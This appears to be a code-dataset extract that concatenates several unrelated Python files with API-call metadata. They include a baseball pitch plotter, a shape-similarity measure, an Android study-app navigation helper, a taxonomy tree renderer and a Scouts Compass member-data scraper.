reactor.run() | [((2, 0, 2, 32), 'twisted.internet.reactor.listenTCP', 'reactor.listenTCP', ({(2, 18, 2, 22): '(8789)', (2, 24, 2, 31): 'factory'}, {}), '(8789, factory)', False, 'from twisted.internet import reactor\n'), ((3, 0, 3, 13), 'twisted.internet.reactor.run', 'reactor.run', ({}, {}), '()', False, 'from twisted.internet import reactor\n')] |
SHUcream00/MLBPitchVisual | __main__.py | a3092cef7cbd4e73f8d0010dd62811df6cc36cac | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def visualize(dataframe, balltype):
df = dataframe
#Filter by balltype
res = df[df["pitch_type"] == balltype]
#Group by results
groups = res.groupby("description")
for name, group in groups:
if name == "miss":
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#9A9A9A", label=name)
else:
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#03A77F", label=name)
#Fixing the viewpoint of the plot
axes = plt.gca()
axes.set_xlim([-2.50,2.50])
axes.set_ylim([0.00,5.00])
#Setting strike zone
sz_top_avg = res["sz_top"].mean()
sz_bottom_avg = res["sz_bot"].mean()
sz_left = -0.85
sz_right = 0.85
#Drawing strike zone
plt.plot((sz_left, sz_right), (sz_top_avg, sz_top_avg), 'k-')
plt.plot((sz_left, sz_right), (sz_bottom_avg, sz_bottom_avg), 'k-')
plt.plot((sz_left, sz_left), (sz_top_avg, sz_bottom_avg), 'k-')
plt.plot((sz_right, sz_right), (sz_top_avg, sz_bottom_avg), 'k-')
#Setting labels
plt.xlabel("Horizontal Location")
plt.ylabel("Vertical Location")
plt.title(f"{player_name} 2018\n {ballname_dict.get(balltype, balltype)}")
plt.legend()
plt.show()
#Setting up Name and CSV location
player_name = "Put player name"
file_src = "Put target csv"
raw = pd.read_csv(file_src)
df = pd.DataFrame(raw)
#For filtering cases
replace_dict = {"description": {"hit_into_play_no_out": "contact", "hit_into_play": "contact", "hit_into_play_score": "contact", "swinging_strike": "miss", "swinging_strike_blocked": "miss"}}
ballname_dict = {"FF": "4-Seam Fastball", "CH": "Changeup", "CU": "Curveball", "SL": "Slider", "FT": "2-Seam Fastball", "AB": "Automatic Ball",
"AS": "Automatic Strike", "EP": "Eephus", "FC": "Cutter", "FO": "Forkball", "FS": "Splitter", "GY": "Gyroball", "IN": "Intentional Ball",
"KC": "Knuckle Curve", "NP": "No Pitch", "PO": "Pitchout", "SC": "Screwball", "SI": "Sinker", "UN": "Unknown"}
df = df.replace(replace_dict)
df = df[df["description"].isin(["contact", "miss"])]
for i in df["pitch_type"].unique():
visualize(df, i)
| [((50, 6, 50, 27), 'pandas.read_csv', 'pd.read_csv', ({(50, 18, 50, 26): 'file_src'}, {}), '(file_src)', True, 'import pandas as pd\n'), ((51, 5, 51, 22), 'pandas.DataFrame', 'pd.DataFrame', ({(51, 18, 51, 21): 'raw'}, {}), '(raw)', True, 'import pandas as pd\n'), ((21, 11, 21, 20), 'matplotlib.pyplot.gca', 'plt.gca', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((32, 4, 32, 65), 'matplotlib.pyplot.plot', 'plt.plot', ({(32, 13, 32, 32): '(sz_left, sz_right)', (32, 34, 32, 58): '(sz_top_avg, sz_top_avg)', (32, 60, 32, 64): '"""k-"""'}, {}), "((sz_left, sz_right), (sz_top_avg, sz_top_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((33, 4, 33, 71), 'matplotlib.pyplot.plot', 'plt.plot', ({(33, 13, 33, 32): '(sz_left, sz_right)', (33, 34, 33, 64): '(sz_bottom_avg, sz_bottom_avg)', (33, 66, 33, 70): '"""k-"""'}, {}), "((sz_left, sz_right), (sz_bottom_avg, sz_bottom_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((34, 4, 34, 67), 'matplotlib.pyplot.plot', 'plt.plot', ({(34, 13, 34, 31): '(sz_left, sz_left)', (34, 33, 34, 60): '(sz_top_avg, sz_bottom_avg)', (34, 62, 34, 66): '"""k-"""'}, {}), "((sz_left, sz_left), (sz_top_avg, sz_bottom_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((35, 4, 35, 69), 'matplotlib.pyplot.plot', 'plt.plot', ({(35, 13, 35, 33): '(sz_right, sz_right)', (35, 35, 35, 62): '(sz_top_avg, sz_bottom_avg)', (35, 64, 35, 68): '"""k-"""'}, {}), "((sz_right, sz_right), (sz_top_avg, sz_bottom_avg), 'k-')", True, 'import matplotlib.pyplot as plt\n'), ((38, 4, 38, 37), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(38, 15, 38, 36): '"""Horizontal Location"""'}, {}), "('Horizontal Location')", True, 'import matplotlib.pyplot as plt\n'), ((39, 4, 39, 35), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(39, 15, 39, 34): '"""Vertical Location"""'}, {}), "('Vertical Location')", True, 'import matplotlib.pyplot as plt\n'), ((42, 4, 42, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((43, 4, 43, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((15, 12, 15, 131), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((17, 12, 17, 131), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n')] |
Toonwire/infancy_eye_tracking | shape_similarity.py | 7b96a9d832f60f83fd5098ada2117ab1d0f56fed | # -*- coding: utf-8 -*-
"""
Created on Sat May 25 13:17:49 2019
@author: Toonw
"""
import numpy as np
def vlen(a):
return (a[0]**2 + a[1]**2)**0.5
def add(v1,v2):
return (v1[0]+v2[0], v1[1]+v2[1])
def sub(v1,v2):
return (v1[0]-v2[0], v1[1]-v2[1])
def unit_vector(v):
vu = v / np.linalg.norm(v)
return (vu[0], vu[1])
def angle_between(v1, v2):
angle = np.arccos(np.dot(v1,v2)/(vlen(v1)*vlen(v2)))
return angle
# Similarity measure of article
## https://pdfs.semanticscholar.org/60b5/aca20ba34d424f4236359bd5e6aa30487682.pdf
def sim_measure(A, B): # similarity between two shapes A and B
# print(A)
# print(B)
return 1 - (sum([(vlen(unit_vector(a))+vlen(unit_vector(b)))*angle_between(a,b) for a,b in zip(A,B)]))/(np.pi*(len(A)+len(B))) | [((21, 14, 21, 31), 'numpy.linalg.norm', 'np.linalg.norm', ({(21, 29, 21, 30): 'v'}, {}), '(v)', True, 'import numpy as np\n'), ((25, 22, 25, 35), 'numpy.dot', 'np.dot', ({(25, 29, 25, 31): 'v1', (25, 32, 25, 34): 'v2'}, {}), '(v1, v2)', True, 'import numpy as np\n')] |
aldwyn/effigia | apps/chats/apps.py | eb456656949bf68934530bbec9c15ebc6d0236b8 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ChatsConfig(AppConfig):
name = 'apps.chats'
def ready(self):
from actstream import registry
registry.register(*self.get_models())
| [] |
JayJJChen/LoveXueXiQiangGuo | utils/ghost.py | 648a38cd73d1eb7ed7267721f1a23c90afb0daee | import os
import time
from utils.eye import Eye
from utils.finger import Finger
class Ghost:
"""class to navigate the app, with Eye and Finger"""
def __init__(self, adb_path, temp_path, sleep_sec=2):
self.eye = Eye(adb_path, temp_path)
self.finger = Finger(adb_path, sleep_sec=sleep_sec)
def to_main(self):
"""back to main page, doesn't support back from exam"""
num_attempts = 0
max_try = 10
while not self._in_main():
if self._in_exam():
self._exit_exam()
else:
self.finger.back()
num_attempts += 1
if num_attempts >= max_try: # failsafe
input("I'm lost! Please help me go to main page! Hit Enter to continue")
def to_score(self):
"""click the score from main page"""
self._bottom_tab(2)
self._goto("score")
def to_exam_root(self):
"""go to the exam page root from main page"""
self._bottom_tab(4)
self._goto("exam_icon")
def _exit_exam(self):
"""exit during exam to main"""
self.finger.back()
self._goto("exit_exam")
self.finger.back()
def swipe_up(self):
self.finger.swipe(500, 1000, 500, 500)
def swipe_down(self):
self.finger.swipe(500, 500, 500, 1000)
def _find_weekly_exam(self):
"""find available weekly exam in weekly exam page"""
path = self._image_path("start_exam")
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
# swipe up if there's no "start_exam"
time.sleep(2)
self.swipe_up()
coords = self.eye.find(path, multi_target=False)
if (fail_count > 10) and (coords is None):
raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _goto(self, img_name):
path = self._image_path(img_name)
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
time.sleep(2)
coords = self.eye.find(path, multi_target=False)
if (fail_count > 5) and (coords is None):
raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _bottom_tab(self, n):
"""
navigate to bottom n_th tab, the screen resolution is 1080x1920
args
n: int, n_th bottom tab
{
n=0: 消息
n=1: 关注
n=2: 学刁
n=3: 视频学习
n=4: 我的
}
"""
x = [108 + 108 * 2 * i for i in range(5)]
y = 1850
self.finger.tap(x[n], y)
def _in_exam(self):
image = self.eye.see()
in_exam = self.eye.find(self._image_path("in_exam"), img=image, multi_target=False)
if in_exam is not None:
return True
else:
return False
def _in_main(self):
image = self.eye.see()
main_act = self.eye.find(self._image_path("main_act"), img=image, multi_target=False)
main_inact = self.eye.find(self._image_path("main_inact"), img=image, multi_target=False)
if (main_act is not None) or (main_inact is not None):
return True
else:
return False
@staticmethod
def _image_path(img_name):
path = os.path.join("images", "{}.png".format(img_name))
return path
| [((12, 19, 12, 43), 'utils.eye.Eye', 'Eye', ({(12, 23, 12, 31): 'adb_path', (12, 33, 12, 42): 'temp_path'}, {}), '(adb_path, temp_path)', False, 'from utils.eye import Eye\n'), ((13, 22, 13, 59), 'utils.finger.Finger', 'Finger', (), '', False, 'from utils.finger import Finger\n'), ((58, 12, 58, 25), 'time.sleep', 'time.sleep', ({(58, 23, 58, 24): '(2)'}, {}), '(2)', False, 'import time\n'), ((70, 12, 70, 25), 'time.sleep', 'time.sleep', ({(70, 23, 70, 24): '(2)'}, {}), '(2)', False, 'import time\n')] |
sanja7s/SR_Twitter | src_taxonomy/bubble_tree_map.py | 2eb499c9aa25ba6e9860cd77eac6832890d2c126 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import random
from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace
def layout(node):
if not node.is_root():
# Add node name to laef nodes
#N = AttrFace("name", fsize=14, fgcolor="black")
#faces.add_face_to_node(N, node, 0)
#pass
faces.add_face_to_node(TextFace(node.name), node, 0)
if "weight" in node.features:
# Creates a sphere face whose size is proportional to node's
# feature "weight"
C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
# Let's make the sphere transparent
C.opacity = 0.3
# And place as a float face over the tree
faces.add_face_to_node(C, node, 0, position="float")
def give_tree_layout(t):
# Some random features in all nodes
for n in t.traverse():
n.add_features(weight=n.dist*20)
# Create an empty TreeStyle
ts = TreeStyle()
# Set our custom layout function
ts.layout_fn = layout
# Draw a tree
#ts.mode = "c"
#ts.arc_start = -180
#ts.arc_span = 180
# We will add node names manually
#ts.show_leaf_name = True
# Show branch data
#ts.show_branch_length = True
#ts.show_branch_support = True
return ts
class Tree7s(object):
def __init__(self, lab):
self.root = Node7s(lab, 0, 0)
def find_root(self):
return self.root
class Node7s(object):
def __init__(self, data, score, lev):
self.data = data
self.score = score
self.level = lev
self.children = []
def add_child(self, lab, score, lev):
if int(self.level) == int(lev-1):
nn = self.find_child(lab)
if nn == None:
self.children.append(Node7s(lab, score, lev))
else:
nn.increase_score(score)
else:
print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data
def find_child(self, label):
for el in self.children:
if el.data == label:
return el
return None
def increase_score(self, sc):
self.score += sc
def print_me(self):
print self.data, self.score
for el in self.children:
el.print_me()
def create_newick(self):
if self.children == []:
return str(self.data + ":" + str(self.score))
newick = "("
for el in self.children:
newick += el.create_newick() + ","
newick = newick[:-1]
if self.level == 0:
newick += ")" + str(self.data) + "."
else:
newick += ")" + str(self.data) + ":" + str(self.score)
return newick
def test_data():
D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\
{"confident": "no", "score": "0.304296", "label": "/pets/cats"},\
{"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}
t7s = Tree7s("ThingAdamsFamily")
for el in D["taxonomy"]:
#n = t7s
n = t7s.find_root()
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
score = float(el["score"])
print levels, taxonomy_tree, score
for i in range(levels):
label = taxonomy_tree[i]
#if n.find_child(label) == None:
n.add_child(label, score, i+1)
n = n.find_child(label)
t7s.find_root().print_me()
t = t7s.find_root()
S = t.create_newick() + ";"
print S
#S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
#T = Tree(S, format=8)
T = Tree(S, format=1)
for node in T.traverse("postorder"):
# Do some analysis on node
print node.name
for node in T.traverse("levelorder"):
# Do some analysis on node
print node.name
#for branch in T
return T
if __name__ == "__main__":
#t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
#t.show(tree_style=ts)
t = test_data()
ts = give_tree_layout(t)
t.show(tree_style=ts)
t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) | [] |
MrNoScript/compass-interface-core | compass/core/_scrapers/member.py | 8c945ef36f7bee396bd5a744404eaa88d280a845 | from __future__ import annotations
import re
import time
from typing import get_args, Literal, TYPE_CHECKING, Union
from lxml import html
from compass.core.interface_base import InterfaceBase
from compass.core.logger import logger
from compass.core.schemas import member as schema
from compass.core.settings import Settings
from compass.core.utility import cast
from compass.core.utility import maybe_int
from compass.core.utility import parse
if TYPE_CHECKING:
import requests
MEMBER_PROFILE_TAB_TYPES = Literal[
"Personal", "Roles", "Permits", "Training", "Awards", "Emergency", "Comms", "Visibility", "Disclosures"
]
class PeopleScraper(InterfaceBase):
"""Class directly interfaces with Compass operations to extract member data.
Compass's MemberProfile.aspx has 13 tabs:
1. Personal Details (No Key)
2. Your Children (Page=CHILD)
3. Roles (Page=ROLES)
4. Permits (Page=PERMITS)
5. Training (Page=TRAINING)
6. Awards (Page=AWARDS)
7. Youth Badges/Awards (Page=BADGES)
8. Event Invitations (Page=EVENTS)
9. Emergency Details (Page=EMERGENCY)
10. Communications (Page=COMMS)
11. Visibility (Page=VISIBILITY)
12. Disclosures (Page=DISCLOSURES)
13. Parents/Guardians (Page=PARENT)
Of these, tabs 2, 7, 8, 13 are disabled functionality.
Tab 11 (Visibility) is only shown on the members' own profile.
For member-adjdacent operations there are additional endpoints:
- /Popups/Profile/AssignNewRole.aspx
- /Popups/Maint/NewPermit.aspx
- /Popups/Profile/EditProfile.aspx
Currently we only use one of these endpoints (AssignNewRole), as all
other data we need can be found from the MemberProfile tabs.
All functions in the class output native types.
"""
def __init__(self, session: requests.Session, validate: bool = False):
"""Constructor for PeopleScraper.
takes an initialised Session object from Logon
"""
super().__init__(session)
self.validate = validate
def _get_member_profile_tab(self, membership_num: int, profile_tab: MEMBER_PROFILE_TAB_TYPES) -> bytes:
"""Returns data from a given tab in MemberProfile for a given member.
Args:
membership_num: Membership Number to use
profile_tab: Tab requested from Compass
Returns:
A dict with content and encoding, e.g.:
{"content": b"...", "encoding": "utf-8"}
Both keys will always be present.
Raises:
ValueError: The given profile_tab value is illegal
Todo:
Other possible exceptions? i.e. from Requests
"""
profile_tab = profile_tab.upper()
tabs = tuple(tab.upper() for tab in get_args(MEMBER_PROFILE_TAB_TYPES))
url = f"{Settings.base_url}/MemberProfile.aspx?CN={membership_num}"
if profile_tab == "PERSONAL": # Personal tab has no key so is a special case
response = self._get(url)
elif profile_tab in tabs:
url += f"&Page={profile_tab}&TAB"
response = self._get(url)
else:
raise ValueError(f"Specified member profile tab {profile_tab} is invalid. Allowed values are {tabs}")
return response.content
def get_personal_tab(self, membership_num: int) -> Union[schema.MemberDetails, dict]:
"""Returns data from Personal Details tab for a given member.
Args:
membership_num: Membership Number to use
Returns:
A dict mapping keys to the corresponding data from the personal
data tab.
For example:
{'membership_number': ...,
'forenames': '...',
'surname': '...',
'main_phone': '...',
'main_email': '...',
'name': '...',
'known_as': '...',
'join_date': datetime.datetime(...),
'sex': '...',
'birth_date': datetime.datetime(...),
'nationality': '...',
'ethnicity': '...',
'religion': '...',
'occupation': '...',
'address': '...'}
Keys will be present only if valid data could be extracted and
parsed from Compass.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Personal")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
details = dict()
# ### Extractors
# ## Core:
details["membership_number"] = membership_num
# Name(s)
names = tree.xpath("//title//text()")[0].strip().split(" ")[3:]
details["forenames"] = names[0]
details["surname"] = " ".join(names[1:])
# Main Phone
details["main_phone"] = tree.xpath('string(//*[text()="Phone"]/../../../td[3])')
# Main Email
details["main_email"] = tree.xpath('string(//*[text()="Email"]/../../../td[3])')
# ## Core - Positional:
# Full Name
details["name"] = tree.xpath("string(//*[@id='divProfile0']//tr[1]/td[2]/label)")
# Known As
details["known_as"] = tree.xpath("string(//*[@id='divProfile0']//tr[2]/td[2]/label)")
# Join Date # TODO Unknown - take date from earliest role?
join_date_str = tree.xpath("string(//*[@id='divProfile0']//tr[4]/td[2]/label)")
details["join_date"] = parse(join_date_str) if join_date_str != "Unknown" else None
# ## Position Varies, only if authorised:
# Gender
details["sex"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Gender:']/../../td[2])")
# DOB
details["birth_date"] = parse(tree.xpath("string(//*[@id='divProfile0']//*[text()='Date of Birth:']/../../td[2])"))
# Nationality
details["nationality"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Nationality:']/../../td[2])")
# Ethnicity
details["ethnicity"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Ethnicity:']/../../td[2])")
# Religion
details["religion"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Religion/Faith:']/../../td[2])")
# Occupation
details["occupation"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Occupation:']/../../td[2])")
# Address
details["address"] = tree.xpath('string(//*[text()="Address"]/../../../td[3])')
# Filter out keys with no value.
details = {k: v for k, v in details.items() if v}
if self.validate:
return schema.MemberDetails.parse_obj(details)
else:
return details
def get_roles_tab(self, membership_num: int, keep_non_volunteer_roles: bool = False) -> Union[schema.MemberRolesDict, dict]:
"""Returns data from Roles tab for a given member.
Sanitises the data to a common format, and removes Occasional Helper, Network, and PVG roles by default.
Args:
membership_num: Membership Number to use
keep_non_volunteer_roles: Keep Helper (OH/PVG) & Network roles?
Returns:
A dict of dicts mapping keys to the corresponding data from the roles tab.
E.g.:
{1234578:
{'role_number': 1234578,
'membership_number': ...,
'role_title': '...',
'role_class': '...',
'role_type': '...',
'location_id': ...,
'location_name': '...',
'role_start_date': datetime.datetime(...),
'role_end': datetime.datetime(...),
'role_status': '...'},
{...}
}
Keys will always be present.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
primary_role
"""
logger.debug(f"getting roles tab for member number: {membership_num}")
response = self._get_member_profile_tab(membership_num, "Roles")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
roles_data = {}
rows = tree.xpath("//tbody/tr")
for row in rows:
# Get children (cells in row)
cells = list(row) # filter out empty elements
# If current role allows selection of role for editing, remove tickbox
if any(el.tag == "input" for el in cells[0]):
cells.pop(0)
role_number = int(row.get("data-pk"))
status_with_review = cells[5].text_content().strip()
if status_with_review.startswith("Full Review Due "):
role_status = "Full"
review_date = parse(status_with_review.removeprefix("Full Review Due "))
else:
role_status = status_with_review
review_date = None
role_details = dict(
role_number=role_number,
membership_number=membership_num,
role_title=cells[0].text_content().strip(),
role_class=cells[1].text_content().strip(),
# role_type only visible if access to System Admin tab
role_type=[*row.xpath("./td[1]/*/@title"), None][0],
# location_id only visible if role is in hierarchy AND location still exists
location_id=cells[2][0].get("data-ng_id"),
location_name=cells[2].text_content().strip(),
role_start=parse(cells[3].text_content().strip()),
role_end=parse(cells[4].text_content().strip()),
role_status=role_status,
review_date=review_date,
can_view_details=any("VIEWROLE" in el.get("class") for el in cells[6]),
)
# Remove OHs etc from list
if not keep_non_volunteer_roles and (
"helper" in role_details["role_class"].lower()
or {role_details["role_title"].lower()} <= {"occasional helper", "pvg", "network member"}
):
continue
roles_data[role_number] = role_details
if self.validate:
return schema.MemberRolesDict.parse_obj(roles_data)
else:
return roles_data
def get_training_tab(
self, membership_num: int, ongoing_only: bool = False
) -> Union[schema.MemberTrainingTab, schema.MemberMOGLList, dict]:
"""Returns data from Training tab for a given member.
Args:
membership_num: Membership Number to use
ongoing_only: Return a dataframe of role training & OGL info? Otherwise returns all data
Returns:
A dict mapping keys to the corresponding data from the training
tab.
E.g.:
{'roles': {1234567: {'role_number': 1234567,
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'location': '...',
'ta_data': '...',
'ta_number': '...',
'ta_name': '...',
'completion': '...',
'wood_badge_number': '...'},
...},
'plps': {1234567: [{'pk': 6142511,
'module_id': ...,
'code': '...',
'name': '...',
'learning_required': False,
'learning_method': '...',
'learning_completed': '...',
'validated_membership_number': '...',
'validated_name': '...'},
...],
...},
'mandatory': {'GDPR':
{'name': 'GDPR',
'completed_date': datetime.datetime(...)},
...}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
response = self._get_member_profile_tab(membership_num, "Training")
tree = html.fromstring(response)
rows = tree.xpath("//table[@id='tbl_p5_TrainModules']/tr")
training_plps = {}
training_roles = {}
for row in rows:
# Personal Learning Plan (PLP) data
if "trPLP" in row.classes:
plp = row
plp_table = plp.getchildren()[0].getchildren()[0]
plp_data = []
for module_row in plp_table:
if module_row.get("class") != "msTR trMTMN":
continue
module_data = {}
child_nodes = list(module_row)
module_data["pk"] = int(module_row.get("data-pk"))
module_data["module_id"] = int(child_nodes[0].get("id")[4:])
matches = re.match(r"^([A-Z0-9]+) - (.+)$", child_nodes[0].text_content()).groups()
if matches:
module_data["code"] = str(matches[0])
module_data["name"] = matches[1]
# Skip processing if we only want ongoing learning data and the module is not GDPR.
if ongoing_only and "gdpr" not in module_data["code"].lower():
continue
learning_required = child_nodes[1].text_content().lower()
module_data["learning_required"] = "yes" in learning_required if learning_required else None
module_data["learning_method"] = child_nodes[2].text_content() or None
module_data["learning_completed"] = parse(child_nodes[3].text_content())
module_data["learning_date"] = parse(child_nodes[3].text_content())
validated_by_string = child_nodes[4].text_content()
if validated_by_string:
# Add empty item to prevent IndexError
validated_by_data = validated_by_string.split(" ", maxsplit=1) + [""]
module_data["validated_membership_number"] = maybe_int(validated_by_data[0])
module_data["validated_name"] = validated_by_data[1]
module_data["validated_date"] = parse(child_nodes[5].text_content())
plp_data.append(module_data)
training_plps[int(plp_table.get("data-pk"))] = plp_data
# Role data
if "msTR" in row.classes:
role = row
child_nodes = list(role)
info = {} # NoQA
info["role_number"] = int(role.xpath("./@data-ng_mrn")[0])
info["role_title"] = child_nodes[0].text_content()
info["role_start"] = parse(child_nodes[1].text_content())
status_with_review = child_nodes[2].text_content()
if status_with_review.startswith("Full (Review Due: "):
info["role_status"] = "Full"
info["review_date"] = parse(status_with_review.removeprefix("Full (Review Due: ").removesuffix(")"))
else:
info["role_status"] = status_with_review
info["review_date"] = None
info["location"] = child_nodes[3].text_content()
training_advisor_string = child_nodes[4].text_content()
if training_advisor_string:
info["ta_data"] = training_advisor_string
# Add empty item to prevent IndexError
training_advisor_data = training_advisor_string.split(" ", maxsplit=1) + [""]
info["ta_number"] = maybe_int(training_advisor_data[0])
info["ta_name"] = training_advisor_data[1]
completion_string = child_nodes[5].text_content()
if completion_string:
info["completion"] = completion_string
parts = completion_string.split(":")
info["completion_type"] = parts[0].strip()
info["completion_date"] = parse(parts[1].strip())
assert len(parts) <= 2, parts[2:]
# info["ct"] = parts[3:] # TODO what is this? From CompassRead.php
info["wood_badge_number"] = child_nodes[5].get("id", "").removeprefix("WB_") or None
training_roles[info["role_number"]] = info
# Handle GDPR:
# Get latest GDPR date
training_ogl = {
"GDPR": dict(
name="GDPR",
completed_date=next(
reversed(
sorted(mod["validated_date"] for plp in training_plps.values() for mod in plp if mod["code"] == "GDPR")
),
None,
),
),
}
for ongoing_learning in tree.xpath("//tr[@data-ng_code]"):
cell_text = {c.get("id", "<None>").split("_")[0]: c.text_content() for c in ongoing_learning}
training_ogl[ongoing_learning.get("data-ng_code")] = dict(
name=cell_text.get("<None>"),
completed_date=parse(cell_text.get("tdLastComplete")),
renewal_date=parse(cell_text.get("tdRenewal")),
)
# TODO missing data-pk from list(cell)[0].tag == "input", and module names/codes. Are these important?
if ongoing_only:
return schema.MemberMOGLList.parse_obj(training_ogl) if self.validate else training_ogl
training_data = {
"roles": training_roles,
"plps": training_plps,
"mandatory": training_ogl,
}
return schema.MemberTrainingTab.parse_obj(training_data) if self.validate else training_data
def get_permits_tab(self, membership_num: int) -> Union[schema.MemberPermitsList, list]:
"""Returns data from Permits tab for a given member.
If a permit has been revoked, the expires value is None and the status is PERM_REV
Args:
membership_num: Membership Number to use
Returns:
A list of dicts mapping keys to the corresponding data from the
permits tab.
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Permits")
tree = html.fromstring(response)
# Get rows with permit content
rows = tree.xpath('//table[@id="tbl_p4_permits"]//tr[@class="msTR msTRPERM"]')
permits = []
for row in rows:
permit = dict(membership_number=membership_num)
child_nodes = list(row)
permit["permit_type"] = child_nodes[1].text_content()
permit["category"] = child_nodes[2].text_content()
permit["type"] = child_nodes[3].text_content()
permit["restrictions"] = child_nodes[4].text_content()
expires = child_nodes[5].text_content()
permit["expires"] = parse(expires) if expires != "Revoked" else None
permit["status"] = child_nodes[5].get("class")
permits.append(permit)
if self.validate:
return schema.MemberPermitsList.parse_obj(permits)
else:
return permits
# See getAppointment in PGS\Needle
def get_roles_detail(
self, role_number: int, response: Union[str, requests.Response] = None
) -> Union[schema.MemberRolePopup, dict]:
"""Returns detailed data from a given role number.
Args:
role_number: Role Number to use
response: Pre-generated response to use
Returns:
A dicts mapping keys to the corresponding data from the
role detail data.
E.g.:
{'hierarchy': {'organisation': 'The Scout Association',
'country': '...',
'region': '...',
'county': '...',
'district': '...',
'group': '...',
'section': '...'},
'details': {'role_number': ...,
'organisation_level': '...',
'birth_date': datetime.datetime(...),
'membership_number': ...,
'name': '...',
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'line_manager_number': ...,
'line_manager': '...',
'ce_check': datetime.datetime(...),
'disclosure_check': '...',
'references': '...',
'appointment_panel_approval': '...',
'commissioner_approval': '...',
'committee_approval': '...'},
'getting_started': {...: {'name': '...',
'validated': datetime.datetime(...),
'validated_by': '...'},
...
}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
renamed_levels = {
"County / Area / Scottish Region / Overseas Branch": "County",
}
renamed_modules = {
1: "module_01",
"TRST": "trustee_intro",
2: "module_02",
3: "module_03",
4: "module_04",
"GDPR": "GDPR",
}
unset_vals = {"--- Not Selected ---", "--- No Items Available ---", "--- No Line Manager ---"}
module_names = {
"Essential Information": "M01",
"Trustee Introduction": "TRST",
"PersonalLearningPlan": "M02",
"Tools for the Role (Section Leaders)": "M03",
"Tools for the Role (Managers and Supporters)": "M04",
"General Data Protection Regulations": "GDPR",
}
references_codes = {
"NC": "Not Complete",
"NR": "Not Required",
"RR": "References Requested",
"S": "References Satisfactory",
"U": "References Unsatisfactory",
}
start_time = time.time()
if response is None:
response = self._get(f"{Settings.base_url}/Popups/Profile/AssignNewRole.aspx?VIEW={role_number}")
logger.debug(f"Getting details for role number: {role_number}. Request in {(time.time() - start_time):.2f}s")
post_response_time = time.time()
if isinstance(response, (str, bytes)):
tree = html.fromstring(response)
else:
tree = html.fromstring(response.content)
form = tree.forms[0]
if form.action == "./ScoutsPortal.aspx?Invalid=Access":
raise PermissionError(f"You do not have permission to the details of role {role_number}")
member_string = form.fields.get("ctl00$workarea$txt_p1_membername")
ref_code = form.fields.get("ctl00$workarea$cbo_p2_referee_status")
role_details = dict()
# Approval and Role details
role_details["role_number"] = role_number
role_details["organisation_level"] = form.fields.get("ctl00$workarea$cbo_p1_level")
role_details["birth_date"] = parse(form.inputs["ctl00$workarea$txt_p1_membername"].get("data-dob"))
role_details["membership_number"] = int(form.fields.get("ctl00$workarea$txt_p1_memberno"))
role_details["name"] = member_string.split(" ", maxsplit=1)[1] # TODO does this make sense - should name be in every role??
role_details["role_title"] = form.fields.get("ctl00$workarea$txt_p1_alt_title")
role_details["role_start"] = parse(form.fields.get("ctl00$workarea$txt_p1_startdate"))
# Role Status
role_details["role_status"] = form.fields.get("ctl00$workarea$txt_p2_status")
# Line Manager
line_manager_el = next((op for op in form.inputs["ctl00$workarea$cbo_p2_linemaneger"] if op.get("selected")), None)
role_details["line_manager_number"] = maybe_int(line_manager_el.get("value")) if line_manager_el is not None else None
role_details["line_manager"] = line_manager_el.text.strip() if line_manager_el is not None else None
# Review Date
role_details["review_date"] = parse(form.fields.get("ctl00$workarea$txt_p2_review"))
# CE (Confidential Enquiry) Check # TODO if CE check date != current date then is valid
